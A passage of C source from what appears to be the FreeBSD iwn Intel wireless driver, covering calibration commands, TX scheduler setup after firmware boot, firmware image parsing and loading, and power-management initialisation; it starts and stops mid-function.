iwn5000_send_calibration(struct iwn_softc *sc)
{
	int idx, error;

	for (idx = 0; idx < IWN5000_PHY_CALIB_MAX_RESULT; idx++) {
		if (!(sc->base_params->calib_need & (1 << idx)))
			continue;	/* This calibration is not required. */
		if (sc->calibcmd[idx].buf == NULL) {
			DPRINTF(sc, IWN_DEBUG_CALIBRATE,
			    "Need calib idx : %d but no available data\n",
			    idx);
			continue;
		}
		DPRINTF(sc, IWN_DEBUG_CALIBRATE,
		    "send calibration result idx=%d len=%d\n",
		    idx, sc->calibcmd[idx].len);
		error = iwn_cmd(sc, IWN_CMD_PHY_CALIB, sc->calibcmd[idx].buf,
		    sc->calibcmd[idx].len, 0);
		if (error != 0) {
			device_printf(sc->sc_dev,
			    "%s: could not send calibration result, error %d\n",
			    __func__, error);
			return error;
		}
	}
	return 0;
}

static int
iwn5000_send_wimax_coex(struct iwn_softc *sc)
{
	struct iwn5000_wimax_coex wimax;

#if 0
	if (sc->hw_type == IWN_HW_REV_TYPE_6050) {
		/* Enable WiMAX coexistence for combo adapters. */
		wimax.flags =
		    IWN_WIMAX_COEX_ASSOC_WA_UNMASK |
		    IWN_WIMAX_COEX_UNASSOC_WA_UNMASK |
		    IWN_WIMAX_COEX_STA_TABLE_VALID |
		    IWN_WIMAX_COEX_ENABLE;
		memcpy(wimax.events, iwn6050_wimax_events,
		    sizeof iwn6050_wimax_events);
	} else
#endif
	{
		/* Disable WiMAX coexistence. */
		wimax.flags = 0;
		memset(wimax.events, 0, sizeof wimax.events);
	}
	DPRINTF(sc, IWN_DEBUG_RESET, "%s: Configuring WiMAX coexistence\n",
	    __func__);
	return iwn_cmd(sc, IWN5000_CMD_WIMAX_COEX, &wimax, sizeof wimax, 0);
}

static int
iwn5000_crystal_calib(struct iwn_softc *sc)
{
	struct iwn5000_phy_calib_crystal cmd;

	memset(&cmd, 0, sizeof cmd);
	cmd.code = IWN5000_PHY_CALIB_CRYSTAL;
	cmd.ngroups = 1;
	cmd.isvalid = 1;
	cmd.cap_pin[0] = le32toh(sc->eeprom_crystal) & 0xff;
	cmd.cap_pin[1] = (le32toh(sc->eeprom_crystal) >> 16) & 0xff;
	DPRINTF(sc, IWN_DEBUG_CALIBRATE, "sending crystal calibration %d, %d\n",
	    cmd.cap_pin[0], cmd.cap_pin[1]);
	return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 0);
}

static int
iwn5000_temp_offset_calib(struct iwn_softc *sc)
{
	struct iwn5000_phy_calib_temp_offset cmd;

	memset(&cmd, 0, sizeof cmd);
	cmd.code = IWN5000_PHY_CALIB_TEMP_OFFSET;
	cmd.ngroups = 1;
	cmd.isvalid = 1;
	if (sc->eeprom_temp != 0)
		cmd.offset = htole16(sc->eeprom_temp);
	else
		cmd.offset = htole16(IWN_DEFAULT_TEMP_OFFSET);
	DPRINTF(sc, IWN_DEBUG_CALIBRATE, "setting radio sensor offset to %d\n",
	    le16toh(cmd.offset));
	return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 0);
}

static int
iwn5000_temp_offset_calibv2(struct iwn_softc *sc)
{
	struct iwn5000_phy_calib_temp_offsetv2 cmd;

	memset(&cmd, 0, sizeof cmd);
	cmd.code = IWN5000_PHY_CALIB_TEMP_OFFSET;
	cmd.ngroups = 1;
	cmd.isvalid = 1;
	if (sc->eeprom_temp != 0) {
		cmd.offset_low = htole16(sc->eeprom_temp);
		cmd.offset_high = htole16(sc->eeprom_temp_high);
	} else {
		cmd.offset_low = htole16(IWN_DEFAULT_TEMP_OFFSET);
		cmd.offset_high = htole16(IWN_DEFAULT_TEMP_OFFSET);
	}
	cmd.burnt_voltage_ref = htole16(sc->eeprom_voltage);
	DPRINTF(sc, IWN_DEBUG_CALIBRATE,
	    "setting radio sensor low offset to %d, high offset to %d, voltage to %d\n",
	    le16toh(cmd.offset_low), le16toh(cmd.offset_high),
	    le16toh(cmd.burnt_voltage_ref));
	return iwn_cmd(sc, IWN_CMD_PHY_CALIB, &cmd, sizeof cmd, 0);
}

/*
 * This function is called after the runtime firmware notifies us of its
 * readiness (called in a process context).
 */
static int
iwn4965_post_alive(struct iwn_softc *sc)
{
	int error, qid;

	if ((error = iwn_nic_lock(sc)) != 0)
		return error;

	DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__);

	/* Clear TX scheduler state in SRAM.
*/ sc->sched_base = iwn_prph_read(sc, IWN_SCHED_SRAM_ADDR); iwn_mem_set_region_4(sc, sc->sched_base + IWN4965_SCHED_CTX_OFF, 0, IWN4965_SCHED_CTX_LEN / sizeof (uint32_t)); /* Set physical address of TX scheduler rings (1KB aligned). */ iwn_prph_write(sc, IWN4965_SCHED_DRAM_ADDR, sc->sched_dma.paddr >> 10); IWN_SETBITS(sc, IWN_FH_TX_CHICKEN, IWN_FH_TX_CHICKEN_SCHED_RETRY); /* Disable chain mode for all our 16 queues. */ iwn_prph_write(sc, IWN4965_SCHED_QCHAIN_SEL, 0); for (qid = 0; qid < IWN4965_NTXQUEUES; qid++) { iwn_prph_write(sc, IWN4965_SCHED_QUEUE_RDPTR(qid), 0); IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | 0); /* Set scheduler window size. */ iwn_mem_write(sc, sc->sched_base + IWN4965_SCHED_QUEUE_OFFSET(qid), IWN_SCHED_WINSZ); /* Set scheduler frame limit. */ iwn_mem_write(sc, sc->sched_base + IWN4965_SCHED_QUEUE_OFFSET(qid) + 4, IWN_SCHED_LIMIT << 16); } /* Enable interrupts for all our 16 queues. */ iwn_prph_write(sc, IWN4965_SCHED_INTR_MASK, 0xffff); /* Identify TX FIFO rings (0-7). */ iwn_prph_write(sc, IWN4965_SCHED_TXFACT, 0xff); /* Mark TX rings (4 EDCA + cmd + 2 HCCA) as active. */ for (qid = 0; qid < 7; qid++) { static uint8_t qid2fifo[] = { 3, 2, 1, 0, 4, 5, 6 }; iwn_prph_write(sc, IWN4965_SCHED_QUEUE_STATUS(qid), IWN4965_TXQ_STATUS_ACTIVE | qid2fifo[qid] << 1); } iwn_nic_unlock(sc); return 0; } /* * This function is called after the initialization or runtime firmware * notifies us of its readiness (called in a process context). */ static int iwn5000_post_alive(struct iwn_softc *sc) { int error, qid; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Switch to using ICT interrupt mode. */ iwn5000_ict_reset(sc); if ((error = iwn_nic_lock(sc)) != 0){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s end in error\n", __func__); return error; } /* Clear TX scheduler state in SRAM. */ sc->sched_base = iwn_prph_read(sc, IWN_SCHED_SRAM_ADDR); iwn_mem_set_region_4(sc, sc->sched_base + IWN5000_SCHED_CTX_OFF, 0, IWN5000_SCHED_CTX_LEN / sizeof (uint32_t)); /* Set physical address of TX scheduler rings (1KB aligned). */ iwn_prph_write(sc, IWN5000_SCHED_DRAM_ADDR, sc->sched_dma.paddr >> 10); IWN_SETBITS(sc, IWN_FH_TX_CHICKEN, IWN_FH_TX_CHICKEN_SCHED_RETRY); /* Enable chain mode for all queues, except command queue. */ if (sc->sc_flags & IWN_FLAG_PAN_SUPPORT) iwn_prph_write(sc, IWN5000_SCHED_QCHAIN_SEL, 0xfffdf); else iwn_prph_write(sc, IWN5000_SCHED_QCHAIN_SEL, 0xfffef); iwn_prph_write(sc, IWN5000_SCHED_AGGR_SEL, 0); for (qid = 0; qid < IWN5000_NTXQUEUES; qid++) { iwn_prph_write(sc, IWN5000_SCHED_QUEUE_RDPTR(qid), 0); IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | 0); iwn_mem_write(sc, sc->sched_base + IWN5000_SCHED_QUEUE_OFFSET(qid), 0); /* Set scheduler window size and frame limit. */ iwn_mem_write(sc, sc->sched_base + IWN5000_SCHED_QUEUE_OFFSET(qid) + 4, IWN_SCHED_LIMIT << 16 | IWN_SCHED_WINSZ); } /* Enable interrupts for all our 20 queues. */ iwn_prph_write(sc, IWN5000_SCHED_INTR_MASK, 0xfffff); /* Identify TX FIFO rings (0-7). */ iwn_prph_write(sc, IWN5000_SCHED_TXFACT, 0xff); /* Mark TX rings (4 EDCA + cmd + 2 HCCA) as active. */ if (sc->sc_flags & IWN_FLAG_PAN_SUPPORT) { /* Mark TX rings as active. */ for (qid = 0; qid < 11; qid++) { static uint8_t qid2fifo[] = { 3, 2, 1, 0, 0, 4, 2, 5, 4, 7, 5 }; iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_ACTIVE | qid2fifo[qid]); } } else { /* Mark TX rings (4 EDCA + cmd + 2 HCCA) as active. 
*/ for (qid = 0; qid < 7; qid++) { static uint8_t qid2fifo[] = { 3, 2, 1, 0, 7, 5, 6 }; iwn_prph_write(sc, IWN5000_SCHED_QUEUE_STATUS(qid), IWN5000_TXQ_STATUS_ACTIVE | qid2fifo[qid]); } } iwn_nic_unlock(sc); /* Configure WiMAX coexistence for combo adapters. */ error = iwn5000_send_wimax_coex(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: could not configure WiMAX coexistence, error %d\n", __func__, error); return error; } if (sc->hw_type != IWN_HW_REV_TYPE_5150) { /* Perform crystal calibration. */ error = iwn5000_crystal_calib(sc); if (error != 0) { device_printf(sc->sc_dev, "%s: crystal calibration failed, error %d\n", __func__, error); return error; } } if (!(sc->sc_flags & IWN_FLAG_CALIB_DONE)) { /* Query calibration from the initialization firmware. */ if ((error = iwn5000_query_calibration(sc)) != 0) { device_printf(sc->sc_dev, "%s: could not query calibration, error %d\n", __func__, error); return error; } /* * We have the calibration results now, reboot with the * runtime firmware (call ourselves recursively!) */ iwn_hw_stop(sc); error = iwn_hw_init(sc); } else { /* Send calibration results to runtime firmware. */ error = iwn5000_send_calibration(sc); } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); return error; } /* * The firmware boot code is small and is intended to be copied directly into * the NIC internal memory (no DMA transfer). */ static int iwn4965_load_bootcode(struct iwn_softc *sc, const uint8_t *ucode, int size) { int error, ntries; size /= sizeof (uint32_t); if ((error = iwn_nic_lock(sc)) != 0) return error; /* Copy microcode image into NIC memory. */ iwn_prph_write_region_4(sc, IWN_BSM_SRAM_BASE, (const uint32_t *)ucode, size); iwn_prph_write(sc, IWN_BSM_WR_MEM_SRC, 0); iwn_prph_write(sc, IWN_BSM_WR_MEM_DST, IWN_FW_TEXT_BASE); iwn_prph_write(sc, IWN_BSM_WR_DWCOUNT, size); /* Start boot load now. */ iwn_prph_write(sc, IWN_BSM_WR_CTRL, IWN_BSM_WR_CTRL_START); /* Wait for transfer to complete. */ for (ntries = 0; ntries < 1000; ntries++) { if (!(iwn_prph_read(sc, IWN_BSM_WR_CTRL) & IWN_BSM_WR_CTRL_START)) break; DELAY(10); } if (ntries == 1000) { device_printf(sc->sc_dev, "%s: could not load boot firmware\n", __func__); iwn_nic_unlock(sc); return ETIMEDOUT; } /* Enable boot after power up. */ iwn_prph_write(sc, IWN_BSM_WR_CTRL, IWN_BSM_WR_CTRL_START_EN); iwn_nic_unlock(sc); return 0; } static int iwn4965_load_firmware(struct iwn_softc *sc) { struct iwn_fw_info *fw = &sc->fw; struct iwn_dma_info *dma = &sc->fw_dma; int error; /* Copy initialization sections into pre-allocated DMA-safe memory. */ memcpy(dma->vaddr, fw->init.data, fw->init.datasz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); memcpy(dma->vaddr + IWN4965_FW_DATA_MAXSZ, fw->init.text, fw->init.textsz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); /* Tell adapter where to find initialization sections. */ if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_write(sc, IWN_BSM_DRAM_DATA_ADDR, dma->paddr >> 4); iwn_prph_write(sc, IWN_BSM_DRAM_DATA_SIZE, fw->init.datasz); iwn_prph_write(sc, IWN_BSM_DRAM_TEXT_ADDR, (dma->paddr + IWN4965_FW_DATA_MAXSZ) >> 4); iwn_prph_write(sc, IWN_BSM_DRAM_TEXT_SIZE, fw->init.textsz); iwn_nic_unlock(sc); /* Load firmware boot code. */ error = iwn4965_load_bootcode(sc, fw->boot.text, fw->boot.textsz); if (error != 0) { device_printf(sc->sc_dev, "%s: could not load boot firmware\n", __func__); return error; } /* Now press "execute". */ IWN_WRITE(sc, IWN_RESET, 0); /* Wait at most one second for first alive notification. 
*/ if ((error = msleep(sc, &sc->sc_mtx, PCATCH, "iwninit", hz)) != 0) { device_printf(sc->sc_dev, "%s: timeout waiting for adapter to initialize, error %d\n", __func__, error); return error; } /* Retrieve current temperature for initial TX power calibration. */ sc->rawtemp = sc->ucode_info.temp[3].chan20MHz; sc->temp = iwn4965_get_temperature(sc); /* Copy runtime sections into pre-allocated DMA-safe memory. */ memcpy(dma->vaddr, fw->main.data, fw->main.datasz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); memcpy(dma->vaddr + IWN4965_FW_DATA_MAXSZ, fw->main.text, fw->main.textsz); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); /* Tell adapter where to find runtime sections. */ if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_write(sc, IWN_BSM_DRAM_DATA_ADDR, dma->paddr >> 4); iwn_prph_write(sc, IWN_BSM_DRAM_DATA_SIZE, fw->main.datasz); iwn_prph_write(sc, IWN_BSM_DRAM_TEXT_ADDR, (dma->paddr + IWN4965_FW_DATA_MAXSZ) >> 4); iwn_prph_write(sc, IWN_BSM_DRAM_TEXT_SIZE, IWN_FW_UPDATED | fw->main.textsz); iwn_nic_unlock(sc); return 0; } static int iwn5000_load_firmware_section(struct iwn_softc *sc, uint32_t dst, const uint8_t *section, int size) { struct iwn_dma_info *dma = &sc->fw_dma; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Copy firmware section into pre-allocated DMA-safe memory. */ memcpy(dma->vaddr, section, size); bus_dmamap_sync(dma->tag, dma->map, BUS_DMASYNC_PREWRITE); if ((error = iwn_nic_lock(sc)) != 0) return error; IWN_WRITE(sc, IWN_FH_TX_CONFIG(IWN_SRVC_DMACHNL), IWN_FH_TX_CONFIG_DMA_PAUSE); IWN_WRITE(sc, IWN_FH_SRAM_ADDR(IWN_SRVC_DMACHNL), dst); IWN_WRITE(sc, IWN_FH_TFBD_CTRL0(IWN_SRVC_DMACHNL), IWN_LOADDR(dma->paddr)); IWN_WRITE(sc, IWN_FH_TFBD_CTRL1(IWN_SRVC_DMACHNL), IWN_HIADDR(dma->paddr) << 28 | size); IWN_WRITE(sc, IWN_FH_TXBUF_STATUS(IWN_SRVC_DMACHNL), IWN_FH_TXBUF_STATUS_TBNUM(1) | IWN_FH_TXBUF_STATUS_TBIDX(1) | IWN_FH_TXBUF_STATUS_TFBD_VALID); /* Kick Flow Handler to start DMA transfer. */ IWN_WRITE(sc, IWN_FH_TX_CONFIG(IWN_SRVC_DMACHNL), IWN_FH_TX_CONFIG_DMA_ENA | IWN_FH_TX_CONFIG_CIRQ_HOST_ENDTFD); iwn_nic_unlock(sc); /* Wait at most five seconds for FH DMA transfer to complete. */ return msleep(sc, &sc->sc_mtx, PCATCH, "iwninit", 5 * hz); } static int iwn5000_load_firmware(struct iwn_softc *sc) { struct iwn_fw_part *fw; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Load the initialization firmware on first boot only. */ fw = (sc->sc_flags & IWN_FLAG_CALIB_DONE) ? &sc->fw.main : &sc->fw.init; error = iwn5000_load_firmware_section(sc, IWN_FW_TEXT_BASE, fw->text, fw->textsz); if (error != 0) { device_printf(sc->sc_dev, "%s: could not load firmware %s section, error %d\n", __func__, ".text", error); return error; } error = iwn5000_load_firmware_section(sc, IWN_FW_DATA_BASE, fw->data, fw->datasz); if (error != 0) { device_printf(sc->sc_dev, "%s: could not load firmware %s section, error %d\n", __func__, ".data", error); return error; } /* Now press "execute". */ IWN_WRITE(sc, IWN_RESET, 0); return 0; } /* * Extract text and data sections from a legacy firmware image. */ static int iwn_read_firmware_leg(struct iwn_softc *sc, struct iwn_fw_info *fw) { const uint32_t *ptr; size_t hdrlen = 24; uint32_t rev; ptr = (const uint32_t *)fw->data; rev = le32toh(*ptr++); /* Check firmware API version. */ if (IWN_FW_API(rev) <= 1) { device_printf(sc->sc_dev, "%s: bad firmware, need API version >=2\n", __func__); return EINVAL; } if (IWN_FW_API(rev) >= 3) { /* Skip build number (version 2 header). 
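		 * (API versions >= 3 carry an extra 32-bit build number after
		 * the revision word, so the header grows by four bytes.)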
*/ hdrlen += 4; ptr++; } if (fw->size < hdrlen) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); return EINVAL; } fw->main.textsz = le32toh(*ptr++); fw->main.datasz = le32toh(*ptr++); fw->init.textsz = le32toh(*ptr++); fw->init.datasz = le32toh(*ptr++); fw->boot.textsz = le32toh(*ptr++); /* Check that all firmware sections fit. */ if (fw->size < hdrlen + fw->main.textsz + fw->main.datasz + fw->init.textsz + fw->init.datasz + fw->boot.textsz) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); return EINVAL; } /* Get pointers to firmware sections. */ fw->main.text = (const uint8_t *)ptr; fw->main.data = fw->main.text + fw->main.textsz; fw->init.text = fw->main.data + fw->main.datasz; fw->init.data = fw->init.text + fw->init.textsz; fw->boot.text = fw->init.data + fw->init.datasz; return 0; } /* * Extract text and data sections from a TLV firmware image. */ static int iwn_read_firmware_tlv(struct iwn_softc *sc, struct iwn_fw_info *fw, uint16_t alt) { const struct iwn_fw_tlv_hdr *hdr; const struct iwn_fw_tlv *tlv; const uint8_t *ptr, *end; uint64_t altmask; uint32_t len, tmp; if (fw->size < sizeof (*hdr)) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); return EINVAL; } hdr = (const struct iwn_fw_tlv_hdr *)fw->data; if (hdr->signature != htole32(IWN_FW_SIGNATURE)) { device_printf(sc->sc_dev, "%s: bad firmware signature 0x%08x\n", __func__, le32toh(hdr->signature)); return EINVAL; } DPRINTF(sc, IWN_DEBUG_RESET, "FW: \"%.64s\", build 0x%x\n", hdr->descr, le32toh(hdr->build)); /* * Select the closest supported alternative that is less than * or equal to the specified one. */ altmask = le64toh(hdr->altmask); while (alt > 0 && !(altmask & (1ULL << alt))) alt--; /* Downgrade. */ DPRINTF(sc, IWN_DEBUG_RESET, "using alternative %d\n", alt); ptr = (const uint8_t *)(hdr + 1); end = (const uint8_t *)(fw->data + fw->size); /* Parse type-length-value fields. */ while (ptr + sizeof (*tlv) <= end) { tlv = (const struct iwn_fw_tlv *)ptr; len = le32toh(tlv->len); ptr += sizeof (*tlv); if (ptr + len > end) { device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n", __func__, fw->size); return EINVAL; } /* Skip other alternatives. 
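		 * (Entries tagged with a non-zero alternative id that does not
		 * match the alternative selected above are ignored.)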
		 */
		if (tlv->alt != 0 && tlv->alt != htole16(alt))
			goto next;

		switch (le16toh(tlv->type)) {
		case IWN_FW_TLV_MAIN_TEXT:
			fw->main.text = ptr;
			fw->main.textsz = len;
			break;
		case IWN_FW_TLV_MAIN_DATA:
			fw->main.data = ptr;
			fw->main.datasz = len;
			break;
		case IWN_FW_TLV_INIT_TEXT:
			fw->init.text = ptr;
			fw->init.textsz = len;
			break;
		case IWN_FW_TLV_INIT_DATA:
			fw->init.data = ptr;
			fw->init.datasz = len;
			break;
		case IWN_FW_TLV_BOOT_TEXT:
			fw->boot.text = ptr;
			fw->boot.textsz = len;
			break;
		case IWN_FW_TLV_ENH_SENS:
			if (!len)
				sc->sc_flags |= IWN_FLAG_ENH_SENS;
			break;
		case IWN_FW_TLV_PHY_CALIB:
			tmp = le32toh(*ptr);
			if (tmp < 253) {
				sc->reset_noise_gain = tmp;
				sc->noise_gain = tmp + 1;
			}
			break;
		case IWN_FW_TLV_PAN:
			sc->sc_flags |= IWN_FLAG_PAN_SUPPORT;
			DPRINTF(sc, IWN_DEBUG_RESET,
			    "PAN Support found: %d\n", 1);
			break;
		case IWN_FW_TLV_FLAGS:
			if (len < sizeof(uint32_t))
				break;
			if (len % sizeof(uint32_t))
				break;
			sc->tlv_feature_flags = le32toh(*ptr);
			DPRINTF(sc, IWN_DEBUG_RESET,
			    "%s: feature: 0x%08x\n", __func__,
			    sc->tlv_feature_flags);
			break;
		case IWN_FW_TLV_PBREQ_MAXLEN:
		case IWN_FW_TLV_RUNT_EVTLOG_PTR:
		case IWN_FW_TLV_RUNT_EVTLOG_SIZE:
		case IWN_FW_TLV_RUNT_ERRLOG_PTR:
		case IWN_FW_TLV_INIT_EVTLOG_PTR:
		case IWN_FW_TLV_INIT_EVTLOG_SIZE:
		case IWN_FW_TLV_INIT_ERRLOG_PTR:
		case IWN_FW_TLV_WOWLAN_INST:
		case IWN_FW_TLV_WOWLAN_DATA:
			DPRINTF(sc, IWN_DEBUG_RESET,
			    "TLV type %d recognized but not handled\n",
			    le16toh(tlv->type));
			break;
		default:
			DPRINTF(sc, IWN_DEBUG_RESET,
			    "TLV type %d not handled\n", le16toh(tlv->type));
			break;
		}
 next:		/* TLV fields are 32-bit aligned. */
		ptr += (len + 3) & ~3;
	}
	return 0;
}

static int
iwn_read_firmware(struct iwn_softc *sc)
{
	struct iwn_fw_info *fw = &sc->fw;
	int error;

	DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__);

	IWN_UNLOCK(sc);

	memset(fw, 0, sizeof (*fw));

	/* Read firmware image from filesystem. */
	sc->fw_fp = firmware_get(sc->fwname);
	if (sc->fw_fp == NULL) {
		device_printf(sc->sc_dev, "%s: could not read firmware %s\n",
		    __func__, sc->fwname);
		IWN_LOCK(sc);
		return EINVAL;
	}
	IWN_LOCK(sc);

	fw->size = sc->fw_fp->datasize;
	fw->data = (const uint8_t *)sc->fw_fp->data;
	if (fw->size < sizeof (uint32_t)) {
		device_printf(sc->sc_dev, "%s: firmware too short: %zu bytes\n",
		    __func__, fw->size);
		firmware_put(sc->fw_fp, FIRMWARE_UNLOAD);
		sc->fw_fp = NULL;
		return EINVAL;
	}

	/* Retrieve text and data sections. */
	if (*(const uint32_t *)fw->data != 0)	/* Legacy image. */
		error = iwn_read_firmware_leg(sc, fw);
	else
		error = iwn_read_firmware_tlv(sc, fw, 1);
	if (error != 0) {
		device_printf(sc->sc_dev,
		    "%s: could not read firmware sections, error %d\n",
		    __func__, error);
		firmware_put(sc->fw_fp, FIRMWARE_UNLOAD);
		sc->fw_fp = NULL;
		return error;
	}

	/* Make sure text and data sections fit in hardware memory. */
	if (fw->main.textsz > sc->fw_text_maxsz ||
	    fw->main.datasz > sc->fw_data_maxsz ||
	    fw->init.textsz > sc->fw_text_maxsz ||
	    fw->init.datasz > sc->fw_data_maxsz ||
	    fw->boot.textsz > IWN_FW_BOOT_TEXT_MAXSZ ||
	    (fw->boot.textsz & 3) != 0) {
		device_printf(sc->sc_dev, "%s: firmware sections too large\n",
		    __func__);
		firmware_put(sc->fw_fp, FIRMWARE_UNLOAD);
		sc->fw_fp = NULL;
		return EINVAL;
	}

	/* We can proceed with loading the firmware. */
	return 0;
}

static int
iwn_clock_wait(struct iwn_softc *sc)
{
	int ntries;

	/* Set "initialization complete" bit. */
	IWN_SETBITS(sc, IWN_GP_CNTRL, IWN_GP_CNTRL_INIT_DONE);

	/* Wait for clock stabilization.
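	 * (Poll the MAC clock-ready bit in IWN_GP_CNTRL for up to 25ms.)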
*/ for (ntries = 0; ntries < 2500; ntries++) { if (IWN_READ(sc, IWN_GP_CNTRL) & IWN_GP_CNTRL_MAC_CLOCK_READY) return 0; DELAY(10); } device_printf(sc->sc_dev, "%s: timeout waiting for clock stabilization\n", __func__); return ETIMEDOUT; } static int iwn_apm_init(struct iwn_softc *sc) { uint32_t reg; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Disable L0s exit timer (NMI bug workaround). */ IWN_SETBITS(sc, IWN_GIO_CHICKEN, IWN_GIO_CHICKEN_DIS_L0S_TIMER); /* Don't wait for ICH L0s (ICH bug workaround). */ IWN_SETBITS(sc, IWN_GIO_CHICKEN, IWN_GIO_CHICKEN_L1A_NO_L0S_RX); /* Set FH wait threshold to max (HW bug under stress workaround). */ IWN_SETBITS(sc, IWN_DBG_HPET_MEM, 0xffff0000); /* Enable HAP INTA to move adapter from L1a to L0s. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_HAP_WAKE_L1A); /* Retrieve PCIe Active State Power Management (ASPM). */ reg = pci_read_config(sc->sc_dev, sc->sc_cap_off + 0x10, 1); /* Workaround for HW instability in PCIe L0->L0s->L1 transition. */ if (reg & 0x02) /* L1 Entry enabled. */ IWN_SETBITS(sc, IWN_GIO, IWN_GIO_L0S_ENA); else IWN_CLRBITS(sc, IWN_GIO, IWN_GIO_L0S_ENA); if (sc->base_params->pll_cfg_val) IWN_SETBITS(sc, IWN_ANA_PLL, sc->base_params->pll_cfg_val); /* Wait for clock stabilization before accessing prph. */ if ((error = iwn_clock_wait(sc)) != 0) return error; if ((error = iwn_nic_lock(sc)) != 0) return error; if (sc->hw_type == IWN_HW_REV_TYPE_4965) { /* Enable DMA and BSM (Bootstrap State Machine). */ iwn_prph_write(sc, IWN_APMG_CLK_EN, IWN_APMG_CLK_CTRL_DMA_CLK_RQT | IWN_APMG_CLK_CTRL_BSM_CLK_RQT); } else { /* Enable DMA. */ iwn_prph_write(sc, IWN_APMG_CLK_EN, IWN_APMG_CLK_CTRL_DMA_CLK_RQT); } DELAY(20); /* Disable L1-Active. */ iwn_prph_setbits(sc, IWN_APMG_PCI_STT, IWN_APMG_PCI_STT_L1A_DIS); iwn_nic_unlock(sc); return 0; } static void iwn_apm_stop_master(struct iwn_softc *sc) { int ntries; /* Stop busmaster DMA activity. */ IWN_SETBITS(sc, IWN_RESET, IWN_RESET_STOP_MASTER); for (ntries = 0; ntries < 100; ntries++) { if (IWN_READ(sc, IWN_RESET) & IWN_RESET_MASTER_DISABLED) return; DELAY(10); } device_printf(sc->sc_dev, "%s: timeout waiting for master\n", __func__); } static void iwn_apm_stop(struct iwn_softc *sc) { iwn_apm_stop_master(sc); /* Reset the entire device. */ IWN_SETBITS(sc, IWN_RESET, IWN_RESET_SW); DELAY(10); /* Clear "initialization complete" bit. */ IWN_CLRBITS(sc, IWN_GP_CNTRL, IWN_GP_CNTRL_INIT_DONE); } static int iwn4965_nic_config(struct iwn_softc *sc) { DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (IWN_RFCFG_TYPE(sc->rfcfg) == 1) { /* * I don't believe this to be correct but this is what the * vendor driver is doing. Probably the bits should not be * shifted in IWN_RFCFG_*. 
*/ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_RFCFG_TYPE(sc->rfcfg) | IWN_RFCFG_STEP(sc->rfcfg) | IWN_RFCFG_DASH(sc->rfcfg)); } IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_RADIO_SI | IWN_HW_IF_CONFIG_MAC_SI); return 0; } static int iwn5000_nic_config(struct iwn_softc *sc) { uint32_t tmp; int error; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); if (IWN_RFCFG_TYPE(sc->rfcfg) < 3) { IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_RFCFG_TYPE(sc->rfcfg) | IWN_RFCFG_STEP(sc->rfcfg) | IWN_RFCFG_DASH(sc->rfcfg)); } IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_RADIO_SI | IWN_HW_IF_CONFIG_MAC_SI); if ((error = iwn_nic_lock(sc)) != 0) return error; iwn_prph_setbits(sc, IWN_APMG_PS, IWN_APMG_PS_EARLY_PWROFF_DIS); if (sc->hw_type == IWN_HW_REV_TYPE_1000) { /* * Select first Switching Voltage Regulator (1.32V) to * solve a stability issue related to noisy DC2DC line * in the silicon of 1000 Series. */ tmp = iwn_prph_read(sc, IWN_APMG_DIGITAL_SVR); tmp &= ~IWN_APMG_DIGITAL_SVR_VOLTAGE_MASK; tmp |= IWN_APMG_DIGITAL_SVR_VOLTAGE_1_32; iwn_prph_write(sc, IWN_APMG_DIGITAL_SVR, tmp); } iwn_nic_unlock(sc); if (sc->sc_flags & IWN_FLAG_INTERNAL_PA) { /* Use internal power amplifier only. */ IWN_WRITE(sc, IWN_GP_DRIVER, IWN_GP_DRIVER_RADIO_2X2_IPA); } if (sc->base_params->additional_nic_config && sc->calib_ver >= 6) { /* Indicate that ROM calibration version is >=6. */ IWN_SETBITS(sc, IWN_GP_DRIVER, IWN_GP_DRIVER_CALIB_VER6); } if (sc->base_params->additional_gp_drv_bit) IWN_SETBITS(sc, IWN_GP_DRIVER, sc->base_params->additional_gp_drv_bit); return 0; } /* * Take NIC ownership over Intel Active Management Technology (AMT). */ static int iwn_hw_prepare(struct iwn_softc *sc) { int ntries; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); /* Check if hardware is ready. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_NIC_READY); for (ntries = 0; ntries < 5; ntries++) { if (IWN_READ(sc, IWN_HW_IF_CONFIG) & IWN_HW_IF_CONFIG_NIC_READY) return 0; DELAY(10); } /* Hardware not ready, force into ready state. */ IWN_SETBITS(sc, IWN_HW_IF_CONFIG, IWN_HW_IF_CONFIG_PREPARE); for (ntries = 0; ntries < 15000; ntries++) { if 